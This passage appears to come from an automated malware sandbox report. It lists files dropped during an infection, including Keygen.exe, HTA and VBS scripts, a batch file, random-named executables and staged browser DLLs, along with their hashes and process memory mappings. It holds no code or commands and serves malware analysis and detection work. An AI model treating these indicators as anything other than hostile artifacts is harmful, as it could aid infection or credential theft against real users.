                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\X2NVC04K\ac[1].exe
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Temp\4JDOc087oh.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\9U5cGXWruS.exe
                      • C:\Users\Admin\AppData\Local\Temp\9U5cGXWruS.exe
                      • C:\Users\Admin\AppData\Local\Temp\B76924n5pU.exe
                      • C:\Users\Admin\AppData\Local\Temp\B76924n5pU.exe
                      • C:\Users\Admin\AppData\Local\Temp\Ch451O06zy.exe
                      • C:\Users\Admin\AppData\Local\Temp\Ch451O06zy.exe
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                      • C:\Users\Admin\AppData\Local\Temp\adTrG3PwTp.exe
                      • C:\Users\Admin\AppData\Local\Temp\adTrG3PwTp.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\ex7vIq0z30.exe
                      • C:\Users\Admin\AppData\Local\Temp\ex7vIq0z30.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\lk0qQlTSlg.exe
                      • C:\Users\Admin\AppData\Local\Temp\lk0qQlTSlg.exe
                      • C:\Users\Admin\AppData\Local\Temp\pliHZ6Y5oE.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Public\fgz.exe
                      • C:\Users\Public\fgz.exe
                      • C:\Users\Public\fgz.exe
                      • C:\Users\Public\tdf.exe
                      • C:\Users\Public\tdf.exe
                      • C:\Users\Public\tdf.exe
                      • C:\Users\Public\uej.exe
                      • C:\Users\Public\uej.exe
                      • C:\Users\Public\uej.exe
                      • C:\Windows\Temp\muu10vsc.exe
                        MD5

                        f4b5c1ebf4966256f52c4c4ceae87fb1

                        SHA1

                        ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                        SHA256

                        88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                        SHA512

                        02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                      • C:\Windows\temp\broqm2l1.inf
                      • C:\Windows\temp\muu10vsc.exe
                        MD5

                        f4b5c1ebf4966256f52c4c4ceae87fb1

                        SHA1

                        ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                        SHA256

                        88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                        SHA512

                        02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                        MD5

                        02cc7b8ee30056d5912de54f1bdfc219

                        SHA1

                        a6923da95705fb81e368ae48f93d28522ef552fb

                        SHA256

                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                        SHA512

                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                        MD5

                        02cc7b8ee30056d5912de54f1bdfc219

                        SHA1

                        a6923da95705fb81e368ae48f93d28522ef552fb

                        SHA256

                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                        SHA512

                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                      • \Users\Admin\AppData\LocalLow\sqlite3.dll
                      • memory/188-445-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/188-440-0x0000000000000000-mapping.dmp
                      • memory/204-16-0x0000000000000000-mapping.dmp
                      • memory/496-491-0x0000000000000000-mapping.dmp
                      • memory/496-490-0x0000000000000000-mapping.dmp
                      • memory/784-18-0x0000000000000000-mapping.dmp
                      • memory/784-86-0x00000000081A0000-0x00000000081A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/784-26-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/784-80-0x0000000007850000-0x0000000007851000-memory.dmp
                        Filesize

                        4KB

                      • memory/1156-15-0x0000000000000000-mapping.dmp
                      • memory/1376-0-0x0000000000000000-mapping.dmp
                      • memory/1504-274-0x0000000000000000-mapping.dmp
                      • memory/1560-238-0x0000000000000000-mapping.dmp
                      • memory/1808-215-0x0000000000000000-mapping.dmp
                      • memory/1932-2-0x0000000000000000-mapping.dmp
                      • memory/1932-3-0x0000000000000000-mapping.dmp
                      • memory/1952-25-0x0000000000000000-mapping.dmp
                      • memory/1952-29-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1952-68-0x0000000007BE0000-0x0000000007BE1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1952-62-0x0000000007B00000-0x0000000007B01000-memory.dmp
                        Filesize

                        4KB

                      • memory/1952-92-0x0000000009A00000-0x0000000009A01000-memory.dmp
                        Filesize

                        4KB

                      • memory/2144-219-0x000000000043FCC3-mapping.dmp
                      • memory/2144-221-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2144-218-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2264-239-0x0000000000000000-mapping.dmp
                      • memory/2276-442-0x0000000000000000-mapping.dmp
                      • memory/2352-7-0x0000000000000000-mapping.dmp
                      • memory/2368-33-0x0000000000000000-mapping.dmp
                      • memory/2424-9-0x0000000000000000-mapping.dmp
                      • memory/2432-425-0x0000000000000000-mapping.dmp
                      • memory/2520-416-0x0000000000000000-mapping.dmp
                      • memory/2708-245-0x0000000000000000-mapping.dmp
                      • memory/2808-10-0x0000000000000000-mapping.dmp
                      • memory/2844-31-0x0000000000000000-mapping.dmp
                      • memory/3084-258-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3084-256-0x0000000000010000-0x0000000000011000-memory.dmp
                        Filesize

                        4KB

                      • memory/3084-278-0x00000000022E0000-0x0000000002304000-memory.dmp
                        Filesize

                        144KB

                      • memory/3084-253-0x0000000000000000-mapping.dmp
                      • memory/3084-255-0x0000000072710000-0x0000000072DFE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3112-236-0x0000000000000000-mapping.dmp
                      • memory/3116-39-0x0000000006FC0000-0x0000000006FC1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3116-28-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3116-50-0x0000000006B20000-0x0000000006B21000-memory.dmp
                        Filesize

                        4KB

                      • memory/3116-17-0x0000000000000000-mapping.dmp
                      • memory/3116-34-0x0000000004420000-0x0000000004421000-memory.dmp
                        Filesize

                        4KB

                      • memory/3128-56-0x0000000007830000-0x0000000007831000-memory.dmp
                        Filesize

                        4KB

                      • memory/3128-74-0x0000000007800000-0x0000000007801000-memory.dmp
                        Filesize

                        4KB

                      • memory/3128-38-0x0000000000000000-mapping.dmp
                      • memory/3128-44-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3216-237-0x0000000001200000-0x0000000001201000-memory.dmp
                        Filesize

                        4KB

                      • memory/3216-223-0x0000000000000000-mapping.dmp
                      • memory/3216-231-0x0000000000900000-0x0000000000901000-memory.dmp
                        Filesize

                        4KB

                      • memory/3216-226-0x0000000072710000-0x0000000072DFE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3216-243-0x000000000AD60000-0x000000000ADB1000-memory.dmp
                        Filesize

                        324KB

                      • memory/3268-98-0x0000000008F20000-0x0000000008F21000-memory.dmp
                        Filesize

                        4KB

                      • memory/3268-27-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3268-19-0x0000000000000000-mapping.dmp
                      • memory/3584-240-0x0000000000000000-mapping.dmp
                      • memory/3652-477-0x0000000000000000-mapping.dmp
                      • memory/3652-478-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3652-485-0x00000000075B0000-0x00000000075B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3652-489-0x0000000007F90000-0x0000000007F91000-memory.dmp
                        Filesize

                        4KB

                      • memory/3728-428-0x0000000000000000-mapping.dmp
                      • memory/3728-433-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3780-13-0x0000000000000000-mapping.dmp
                      • memory/3880-43-0x0000000000000000-mapping.dmp
                      • memory/3880-109-0x000000000AC30000-0x000000000AC31000-memory.dmp
                        Filesize

                        4KB

                      • memory/3880-106-0x0000000009DC0000-0x0000000009DC1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3880-104-0x000000000A690000-0x000000000A691000-memory.dmp
                        Filesize

                        4KB

                      • memory/3880-47-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4212-461-0x0000000004D40000-0x0000000004D45000-memory.dmp
                        Filesize

                        20KB

                      • memory/4212-459-0x00000000024F0000-0x0000000002502000-memory.dmp
                        Filesize

                        72KB

                      • memory/4212-411-0x0000000000000000-mapping.dmp
                      • memory/4212-424-0x0000000000D40000-0x0000000000D41000-memory.dmp
                        Filesize

                        4KB

                      • memory/4212-420-0x0000000000290000-0x0000000000291000-memory.dmp
                        Filesize

                        4KB

                      • memory/4212-414-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4220-432-0x0000000000000000-mapping.dmp
                      • memory/4308-148-0x0000000000000000-mapping.dmp
                      • memory/4328-248-0x0000000000417A8B-mapping.dmp
                      • memory/4328-247-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/4328-250-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/4348-144-0x0000000000000000-mapping.dmp
                      • memory/4360-145-0x0000000000000000-mapping.dmp
                      • memory/4368-146-0x0000000000000000-mapping.dmp
                      • memory/4428-276-0x0000000000000000-mapping.dmp
                      • memory/4436-166-0x000000000043FCC3-mapping.dmp
                      • memory/4436-170-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/4524-435-0x0000000000000000-mapping.dmp
                      • memory/4524-441-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4548-409-0x0000000000000000-mapping.dmp
                      • memory/4552-400-0x0000000000000000-mapping.dmp
                      • memory/4552-408-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4552-404-0x00000000002B0000-0x00000000002B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4552-403-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4556-163-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/4556-165-0x000000000043FCC3-mapping.dmp
                      • memory/4556-169-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/4632-183-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/4632-171-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/4632-173-0x0000000000417A8B-mapping.dmp
                      • memory/4680-487-0x0000000000000000-mapping.dmp
                      • memory/4764-178-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/4764-174-0x000000000041A684-mapping.dmp
                      • memory/4764-172-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/4796-181-0x000000000041A684-mapping.dmp
                      • memory/4804-184-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/4804-180-0x0000000000417A8B-mapping.dmp
                      • memory/4844-457-0x0000000000000000-mapping.dmp
                      • memory/4896-426-0x0000000001170000-0x0000000001171000-memory.dmp
                        Filesize

                        4KB

                      • memory/4896-415-0x0000000000000000-mapping.dmp
                      • memory/4896-467-0x0000000004E80000-0x0000000004E91000-memory.dmp
                        Filesize

                        68KB

                      • memory/4896-476-0x0000000005980000-0x0000000005983000-memory.dmp
                        Filesize

                        12KB

                      • memory/4896-422-0x0000000000B90000-0x0000000000B91000-memory.dmp
                        Filesize

                        4KB

                      • memory/4896-419-0x00000000714F0000-0x0000000071BDE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4948-462-0x0000000000000000-mapping.dmp
                      • memory/4948-472-0x0000000004380000-0x0000000004381000-memory.dmp
                        Filesize

                        4KB

                      • memory/4968-284-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/4968-282-0x000000000041A684-mapping.dmp
                      • memory/4968-281-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/5028-122-0x0000000000000000-mapping.dmp
                      • memory/5036-123-0x0000000000000000-mapping.dmp
                      • memory/5092-216-0x0000000005E90000-0x0000000005E9D000-memory.dmp
                        Filesize

                        52KB

                      • memory/5092-140-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
                        Filesize

                        4KB

                      • memory/5092-205-0x0000000005DE0000-0x0000000005E90000-memory.dmp
                        Filesize

                        704KB

                      • memory/5092-130-0x0000000000000000-mapping.dmp
                      • memory/5092-135-0x0000000070BC0000-0x00000000712AE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/5092-206-0x0000000006480000-0x0000000006481000-memory.dmp
                        Filesize

                        4KB